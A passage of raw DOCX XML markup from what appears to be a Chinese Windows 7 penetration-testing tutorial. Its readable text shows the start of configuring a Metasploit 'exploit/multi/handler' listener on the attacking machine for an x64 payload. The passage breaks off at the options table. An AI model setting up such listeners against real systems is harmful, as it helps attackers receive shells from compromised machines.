          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w: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321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>置攻击机msf：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="151" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4911" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5151" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:468.710pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,9374">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:9374" coordorigin="10402,0" coordsize="0,9374" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,4,10402,5,10402,7,10402,9,10402,12,10402,15,10402,18,10402,22,10402,27,10402,32,10402,38,10402,44,10402,51,10402,59,10402,67,10402,76,10402,86,10402,97,10402,109,10402,122,10402,135,10402,150,10402,165,10402,182,10402,199,10402,218,10402,238,10402,259,10402,281,10402,305,10402,329,10402,356,10402,383,10402,412,10402,442,10402,473,10402,506,10402,541,10402,577,10402,615,10402,654,10402,695,10402,737,10402,782,10402,828,10402,875,10402,925,10402,976,10402,1030,10402,1085,10402,1142,10402,1201,10402,1262,10402,1325,10402,1390,10402,1458,10402,1527,10402,1599,10402,1673,10402,1749,10402,1827,10402,1908,10402,1990,10402,2076,10402,2164,10402,2254,10402,2346,10402,2441,10402,2539,10402,2639,10402,2742,10402,2848,10402,2956,10402,3067,10402,3180,10402,3297,10402,3416,10402,3538,10402,3663,10402,3790,10402,3921,10402,4055,10402,4191,10402,4331,10402,4474,10402,4620,10402,4769,10402,4921,10402,5077,10402,5235,10402,5397,10402,5562,10402,5731,10402,5903,10402,6078,10402,6257,10402,6439,10402,6625,10402,6814,10402,7007,10402,7204,10402,7404,10402,7607,10402,7815,10402,8026,10402,8241,10402,8460,10402,8682,10402,8909,10402,9139,10402,9374e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:390" coordorigin="1490,970" coordsize="8990,390" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1024,10484,1026,10484,1027,10484,1029,10484,1031,10484,1033,10484,1035,10484,1037,10484,1039,10484,1041,10484,1043,10484,1045,10484,1048,10484,1050,10484,1053,10484,1055,10484,1058,10484,1061,10484,1064,10484,1066,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1113,10484,1118,10484,1122,10484,1127,10484,1131,10484,1136,10484,1141,10484,1146,10484,1151,10484,1156,10484,1162,10484,1167,10484,1173,10484,1179,10484,1184,10484,1190,10484,1196,10484,1203,10484,1209,10484,1216,10484,1222,10484,1229,10484,1236,10484,1243,10484,1250,10484,1257,10484,1265,10484,1272,10484,1280,10484,1288,10484,1296,10484,1304,10484,1312,10484,1321,10484,1329,10484,1338,10484,1347,10484,1356,10484,1365,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10483,1375,10482,1375,10482,1375,10480,1375,10479,1375,10477,1375,10475,1375,10473,1375,10470,1375,10466,1375,10462,1375,10458,1375,10453,1375,10448,1375,10442,1375,10435,1375,10428,1375,10419,1375,10411,1375,10401,1375,10391,1375,10379,1375,10367,1375,10354,1375,10340,1375,10326,1375,10310,1375,10293,1375,10275,1375,10256,1375,10236,1375,10215,1375,10192,1375,10168,1375,10143,1375,10117,1375,10090,1375,10061,1375,10031,1375,9999,1375,9966,1375,9931,1375,9895,1375,9858,1375,9819,1375,9778,1375,9735,1375,9691,1375,9646,1375,9598,1375,9549,1375,9498,1375,9445,1375,9391,1375,9334,1375,9275,1375,9215,1375,9153,1375,9088,1375,9022,1375,8953,1375,8883,1375,8810,1375,8735,1375,8658,1375,8578,1375,8497,1375,8413,1375,8326,1375,8238,1375,8146,1375,8053,1375,7957,1375,7859,1375,7758,1375,7654,1375,7548,1375,7439,1375,7328,1375,7214,1375,7097,1375,6977,1375,6855,1375,6730,1375,6602,1375,6471,1375,6337,1375,6201,1375,6061,1375,5918,1375,5773,1375,5624,1375,5472,1375,5317,1375,5159,1375,4997,1375,4833,1375,4665,1375,4494,1375,4319,1375,4141,1375,3960,1375,3776,1375,3587,1375,3396,1375,3201,1375,3002,1375,2800,1375,2594,1375,2385,1375,2172,1375,1955,1375,1734,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1373,1510,1373,1510,1373,1510,1373,1510,1372,1510,1372,1510,1372,1510,1371,1510,1371,1510,1370,1510,1370,1510,1369,1510,1369,1510,1368,1510,1367,1510,1367,1510,1366,1510,1365,1510,1364,1510,1363,1510,1362,1510,1361,1510,1360,1510,1359,1510,1358,1510,1357,1510,1356,1510,1354,1510,1353,1510,1352,1510,1350,1510,1348,1510,1347,1510,1345,1510,1343,1510,1342,1510,1340,1510,1338,1510,1336,1510,1333,1510,1331,1510,1329,1510,1327,1510,1324,1510,1322,1510,1319,1510,1316,1510,1314,1510,1311,1510,1308,1510,1305,1510,1302,1510,1298,1510,1295,1510,1292,1510,1288,1510,1284,1510,1281,1510,1277,1510,1273,1510,1269,1510,1265,1510,1261,1510,1256,1510,1252,1510,1247,1510,1243,1510,1238,1510,1233,1510,1228,1510,1223,1510,1218,1510,1212,1510,1207,1510,1201,1510,1196,1510,1190,1510,1184,1510,1178,1510,1171,1510,1165,1510,1159,1510,1152,1510,1145,1510,1138,1510,1131,1510,1124,1510,1117,1510,1110,1510,1102,1510,1094,1510,1086,1510,1078,1510,1070,1510,1062,1510,1053,1510,1045,1510,1036,1510,1027,1510,1018,1510,1009,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:390" coordorigin="1490,990" coordsize="30,390" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1008,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1020,1517,1021,1517,1023,1517,1024,1517,1026,1517,1027,1517,1029,1517,1031,1517,1033,1517,1035,1517,1037,1517,1039,1517,1041,1517,1043,1517,1045,1517,1048,1517,1050,1517,1053,1517,1055,1517,1058,1517,1061,1517,1064,1517,1066,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1090,1517,1093,1517,1097,1517,1101,1517,1105,1517,1109,1517,1113,1517,1118,1517,1122,1517,1127,1517,1131,1517,1136,1517,1141,1517,1146,1517,1151,1517,1156,1517,1162,1517,1167,1517,1173,1517,1179,1517,1184,1517,1190,1517,1196,1517,1203,1517,1209,1517,1216,1517,1222,1517,1229,1517,1236,1517,1243,1517,1250,1517,1257,1517,1265,1517,1272,1517,1280,1517,1288,1517,1296,1517,1304,1517,1312,1517,1321,1517,1329,1517,1338,1517,1347,1517,1356,1517,1365,1517,1375e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:67.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,350">
